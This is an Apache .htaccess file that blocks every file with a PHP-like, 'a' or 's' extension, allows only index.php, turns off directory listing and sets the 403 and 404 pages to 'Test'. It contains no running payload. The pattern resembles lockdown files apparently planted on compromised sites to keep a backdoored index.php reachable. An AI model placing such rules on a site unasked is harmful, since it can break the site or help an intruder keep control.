<Files *.ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.a*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.S*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.pH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.PH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.s*>
    Order Deny,Allow
    Deny from all
</Files>
<FilesMatch "^(index.php)$">
    Order allow,deny
    Allow from all
</FilesMatch>
<FilesMatch "\\.(ph.*|a.*|P[hH].*|S.*)$"> 
    Require all denied 
</FilesMatch>
 
<FilesMatch "^(index.php)$">
    Require all granted 
</FilesMatch> 

DirectoryIndex index.php 
Options -Indexes 
 
ErrorDocument 403 "Test"
ErrorDocument 404 "Test"
